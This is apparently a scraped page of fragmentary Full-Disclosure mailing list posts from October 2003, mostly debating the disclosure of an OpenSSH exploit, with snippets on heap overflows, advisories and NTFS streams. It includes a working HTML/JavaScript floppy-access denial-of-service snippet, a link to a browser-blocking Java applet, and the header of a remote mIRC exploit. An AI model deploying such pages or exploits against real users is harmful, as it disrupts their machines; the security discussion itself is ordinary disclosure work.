Yeah, Paul, you're a real smart guy I see! Just like everyone else who
wants to see one of the exploits for the bug, you try to taunt those of us
who are somewhat skilled at programming and have already developed our own
commercial grade exploits to release what we have slaved over. Of course,
On Mon, 20 Oct 2003, Frank Knobbe wrote:
Right then. Perhaps that makes me a script kiddie. I just can not
comprehend a case where an unknown area of the heap is overwritten with
0's causes a fault that is exploitable to the point of executing
injected code. I mean, you don't inject code.
Hi Paul,
Again, what is it about your personality that makes you incapable
of taking part in an adult discussion of responsible disclosure
issues? Is it that anyone who has a different opinion than yours
is automatically not worth your time? That sounds kind of nazi-like
to me mr. Schmehl.
It's
On Tue, 2003-10-21 at 02:21, Michal Zalewski wrote:
While I'd hate to take sides on the OpenSSH vulnerability, this alone is
not a problem. On little endian machines, other than overwriting (zeroing)
variables, you can also benefit from partial pointer overwrite,
Howdy Michal,
just to
Today I have had 3 computers--one Win XP and two Win2000--reported where
svchost.exe crashes with the
following error message:
-begin-quote-
Error: svchost.exe - Application Error
The instruction at 0x1000526f referenced memory at 0x.
The memory could not be read. Click on Ok to
There's two sets of bad attitude going round and round in this thread.
Heating the debate to pure sillyness.
One shown by the parties that understand how a buffer overflow with
only zeroes can be exploited, but who until today have refused to
even mention the theory behind it. Resorting to if
hmm..
On Tue, Oct 21, 2003 at 12:02:19AM -0500, Paul Schmehl wrote:
--On Monday, October 20, 2003 5:19 PM -0700 Gregory A. Gilliss
[EMAIL PROTECTED] wrote:
/* snip */
Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
adjunct n. 1. Something attached to another thing
James,
You may be thinking of Streams in Windows files. Data can be hidden in secondary
files on NTFS partitions. I believe it was developed to be compatible with Apple/ MAC
systems. In any case the following is an example:
Run CMD
On a NTFS partition
D:\ echo Hello FrontFile
D:\ type
The experts gave very clear evidence that the attack was initiated
locally and log files cannot be planted remotely the way they werew
found on his computer.
I would be astonished if this were true - there is *no limit* on what a
trojan can do if it gains full control of your computer.
This is a well-known issue that was even part of the MCSE for NT 3.51
tutorial guides ;) Anyhow, it is still an issue, and the root cause for
others (like the IIS $$DATA information disclosure vulnerability). If
you google for it, you will also find tools to detect those alternate
data streams.
This is a vendor-bulletin.
There is a potential DoS in Interactive Syslog Server, a debugging and
interactive troubleshooting tool, included in WinSyslog and MonitorWare
Agent. All versions downloaded prior to 2003-09-16 have the vulnerable
component included and installed by default.
Full
The JAP folks have won a major court victory.
See their site.
http://anon.inf.tu-dresden.de/index_en.html
This is of course true - JAP have won a great moral victory.
Unfortunately, they may have acheived the moral high ground in court, but
the fact still remains that they
a) DID trojan their
On Oct 8, SANS released version 4 of the 20 most critical internet
security issues, a comprehensively commented list consisting of the
Top10 MICROS~1 Windows and Top10 UNIX(-like) OS'/services' problems:
http://www.sans.org/top20/
Regards,
// Veit
--
_. ._ . .Veit Wahlich
(_. )
At 04:18 AM 10/21/03 -0700, John Sage wrote:
So by the word - you yourself have chosen - you're somebody
important's subordinate, temporary flunky.
I know I'm impressed.
Almost all of us fit that description.
Stop it.
m5x
___
Full-Disclosure - We
-Original Message-
From: security snot [mailto:[EMAIL PROTECTED]
Sent: Tuesday, October 21, 2003 1:59 AM
To: Schmehl, Paul L
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] No Subject (re: openssh exploit code?)
Yeah, Paul, you're a real smart guy I see! Just like
-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
Sent: Tuesday, October 21, 2003 2:23 AM
To: Schmehl, Paul L
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] No Subject (re: openssh exploit code?)
Again, what is it about your personality that makes you
On Tue, 21 Oct 2003, Frank Knobbe wrote:
just to clarify, you mean on machines with a paged memory addressing
scheme, right? I mean, byte-order itself is not the catalyst, but the
fact that an address is formed by a page and a pointer within that page,
right? (I'm not nit-picking, just trying
On Tue, 21 Oct 2003, Schmehl, Paul L [EMAIL PROTECTED] wrote:
I personally would prefer that every system gets patched the day the
patch is released.
I wouldn't. What happens when the patch is broken? But that's just one
more factor to consider, underneath your larger argument: in the real
Hi Paul,
I'm glad to see you are capable of a sensible response. I see
your points and it's nothing I haven't heard before. The thing
is, your arguments don't really hold any ground in this particular
event.
I've said all along that this issue has been publicly recognised
as being a security
SQL Injection Vulnerability in FuzzyMonkey MyClassifieds SQL Version
18 October 2003
Original Advisory
http://www.sintelli.com/adv/sa-2003-04-myclassified.pdf
Background
My Classifieds SQL is a Perl/CGI/MySQL script which will quickly and easily
allow the hosting of a classifieds forum on a
Aloha, Mitch.
Your essay on the immorality of releasing exploit code was very well
thought out, and I commend you for it and for standing up for something
that you believe in -- particularly in a venue that is openly hostile to
your viewpoint.
That having been said, your conclusions are
Aloha, Mitch.
Your essay on the immorality of releasing exploit code was very well
thought out, and I commend you for it and for standing up for something
that you believe in -- particularly in a venue that is openly hostile to
your viewpoint.
That having been said, your conclusions are
That is not the point. They were required by law to do
this secretly. Actually, publishing the source code that
revealed the changes was already bending the law. So
what you are asking for is that they break the law and
give up their careers.
To be honest? I don't know.
I could hope that if I
On Tue, 21 Oct 2003 00:22:53 PDT, [EMAIL PROTECTED] said:
As far as it being easy to exploit. No it isn't. You have to
abuse a lesser issue, a memory leak to be more precise, to get
a heap layout that will allow you to survive the initial memset
without landing in bad memory. Now without going
Hi Jason,
First of all, thanks for taking the time to write a well thought
out response to my views and my statements.
Now let's get to it.
That having been said, your conclusions are wrong. In part this
is caused by a simple slip of logic and perhaps a flawed
understanding of statistics.
Hello All,
Right now I am looking for a directory that lists local Penetration Testing
Companies in the NYC and New Jersey area. I have been able to track down a
rather large amount but I am still looking for additional companies.
I have a project that may need bidding in the future and would
-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
Sent: Tuesday, October 21, 2003 12:18 PM
To: Schmehl, Paul L
Cc: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] No Subject (re: openssh exploit code?)
I've said all along that this issue has been publicly
Posted on security corporation : http://www.security-corporation.com/exploits-20031021-001.html
/** gEEk-fuck-khaled.c -- remote mirc 6.11 exploit by blasty TESTED ON: Windows XP (No SP, Ducth) Build: 2600.xpclient.010817-1148 A few days ago, I saw a mIRC advisory on packetstorm [1
Anyone know what runs on tcp port 255? Any known viruses or trojans?
NapoleonMichal Zalewski [EMAIL PROTECTED] wrote:
On Tue, 21 Oct 2003, Frank Knobbe wrote: just to clarify, you mean on machines with a paged memory addressing scheme, right? I mean, byte-order itself is not the catalyst, but the
If I have say.. 100 boxes with ssh on them I would not be likely to drop
them all, install the patches and bring them back up for an exploit that
snip
*May** allow a remote attacker to corrupt heap memory
Which in turn
*could cause a
denial-of-service condition.
Furthermore
It
Posted on security corporation : http://www.security-corporation.com/exploits-20031021-001.html
Do you Yahoo!?
The New Yahoo! Shopping - with improved product search
[EMAIL PROTECTED] wrote:
My main point being there is simply no
need for the disclosure of exploits.
English is a funny language. Based on the rest of your note, I assume
by no need, you mean that there's no one forcing you to release your
exploits, and you see no moral imperitive that says
what a lame exploit on a lame site, just a mirror of
packetstorm and k-otic ...
Peter
/** gEEk-fuck-khaled.c -- remote mirc 6.11 exploit
by blasty
**
** TESTED ON: Windows XP (No SP, Ducth) Build:
2600.xpclient.010817-1148
**
** A few days ago, I saw a mIRC advisory on
packetstorm [1]
Hi friends,
This weekend i had to study a lot so i coludn't finish the NASA related
report.
This Sunday it will be finished and public available ( some sections will be
closed until Nasa response team patches the
websites ).
So,
Best Reagards to all and thanks to everybody that suggested the best
Dear Mark,
There is a file useful for something , it is the way to bypass the
authentication.
imagine how to include the file for use as auth data this:
username password
USEFUL FOR SOMETHING , IT IS AN EASY LEVEL ;-)
so , try to do a little research in the next level,
there is a lot of info
I agree with Mitch. Lets say you get an advisory that
a severe thunderstorm may be coming your way. Do you
wait until the wind and rain are blowing inside your
house to close the windows and doors. Do you allow
the kids to keep playing outside? You do the prudent
thing. Instead of trying to
-Original Message-
From: Blue Boar [mailto:[EMAIL PROTECTED]
Sent: Tuesday, October 21, 2003 2:19 PM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] No Subject (re: openssh exploit code?)
[EMAIL PROTECTED] wrote:
My main point being
Hi Paul,
Admins and management base decisions on those differences. Now
let's look at the case at hand, which you characterize as
devastating.
Yes, lets.
Note the words may..cause a denial-of-service condition and
may.execute arbitrary code. It is those vagaries that folks
who
-Original Message-
From: Montana Tenor [mailto:[EMAIL PROTECTED]
Sent: Tuesday, October 21, 2003 3:05 PM
To: Schmehl, Paul L
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] No Subject (re: openssh exploit code?)
I agree with Mitch. Lets say you get an
-Original Message-
From: Montana Tenor [mailto:[EMAIL PROTECTED]
Sent: Tuesday, October 21, 2003 3:05 PM
To: Schmehl, Paul L
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] No Subject (re: openssh exploit code?)
I agree with Mitch. Lets say you get an
* Montana Tenor ([EMAIL PROTECTED]) [031021 13:59]:
I agree with Mitch. Lets say you get an advisory that
a severe thunderstorm may be coming your way. Do you
wait until the wind and rain are blowing inside your
house to close the windows and doors. Do you allow
the kids to keep playing
Hi Robert,
--- Robert Ahnemann [EMAIL PROTECTED]
wrote:
I flip to the local radar and get some sort of proof
that there might be
a thunderstorm coming. Talk is cheap (as was said),
so its up to the
admin to verify if A) there is a real threat B) the
threat applies to
your systems C) the
Hi Robert,
--- Robert Ahnemann [EMAIL PROTECTED]
wrote:
I flip to the local radar and get some sort of proof
that there might be
a thunderstorm coming. Talk is cheap (as was said),
so its up to the
admin to verify if A) there is a real threat B) the
threat applies to
your
On Tue, Oct 21, 2003 at 01:05:20PM -0700, [EMAIL PROTECTED] wrote:
Full disclosure is an excersise in futility.
Anybody else think this thread has dragged on long enough?
If so, please let's not feed the troll.
--
Dan Wilder
___
Full-Disclosure -
-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
Sent: Tuesday, October 21, 2003 3:05 PM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] No Subject (re: openssh exploit code?)
Then this means that, if you as an admin cannot rely on the
proper designated
On Tuesday 21 October 2003 17:07, Robert Ahnemann wrote:
I flip to the local radar and get some sort of proof that there might be
a thunderstorm coming. Talk is cheap (as was said), so its up to the
admin to verify if A) there is a real threat B) the threat applies to
your systems C) the
So I know of a way to patch openssh without taking the server down, but that
would improve efficiency and generally be useful knowledge to the security
community so I'm not going to tell anyone about it on this full disclosure
mailing list, I'd rather just flaunt my knowledge and gloat secretly
On Tue, 21 Oct 2003, Montana Tenor wrote:
I agree with Mitch. Lets say you get an advisory that
a severe thunderstorm may be coming your way. Do you
wait until the wind and rain are blowing inside your
house to close the windows and doors. Do you allow
the kids to keep playing outside?
On somedate Montana said...
I agree with Mitch. Lets say you get an advisory that
a severe thunderstorm may be coming your way. Do you
wait until the wind and rain are blowing inside your
house to close the windows and doors.
snip
This is one of the silliest analogies I have ever heard. If
On Tue, 2003-10-21 at 11:42, Michal Zalewski wrote:
On low endian, you can
change a pointer such as:
0x08049648
...to be one of the following:
0x08049600
0x0804
0x0800
Ah, duh... that just didn't enter my brain since I was focused on the
exploit at hand, which I believe
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hi,
be prepared that your IE6 will be blocked if you
run the java plugin (any 1.4.x including 1.4.2_02)
with the following applet:
http://www.illegalaccess.org/exploits/java/applet/MyFloppySucks.html
Of course this only work when you have a drive
Here's a more general approach to using the floppy drive for a DoS attack on
a Windows machine:
html
head
/head
body
script
for(i = 1; i = 2000; ++i)
{
document.writeln(img src=a:\\foo + i + .gif width=1 height=1);
}
/script
/body
/html
The fundamental problem here is that a Web page
On Tue, 21 Oct 2003, Frank Knobbe wrote:
Ah, duh... that just didn't enter my brain since I was focused on the
exploit at hand, which I believe doesn't not allow such a precise
sniping.
Once again, I don't want to take sides, I had barely seen the code, never
really bothered to analyze the
These paragraphs do more to convince me that the exploit is
possible than all the rest of the flame war put together. Thanks,
both of you.
does anybody need a refresher on heap overflows? :)
http://vg.rstack.org/download/l01/bof.pdf (2002 btw)
chapter 3 and 3.6 in particular.
and of course
--On Wednesday, October 22, 2003 1:20 AM +0200 Michal Zalewski
[EMAIL PROTECTED] wrote:
Rant: mainstream Linux is generally not all that enthusiastic about
implementing security features (even non-executable stack or using some
feeble but standard kernel security capabilities is quite unpopular
On Tue, 2003-10-21 at 21:41, Paul Schmehl wrote:
--On Wednesday, October 22, 2003 1:20 AM +0200 Michal Zalewski
[EMAIL PROTECTED] wrote:
Rant: mainstream Linux is generally not all that enthusiastic about
implementing security features (even non-executable stack or using some
feeble but
unfortunatly the windowz RPC exploit, without PoC
would have gone unheeded in patching had it not
been for a binary release of the exploit, and
that was one of the worst in history. now, despite
the millions of owned systems, this vulnerability
is nearly extinct. even i get PoC from friendz
that
57 matches
Mail list logo
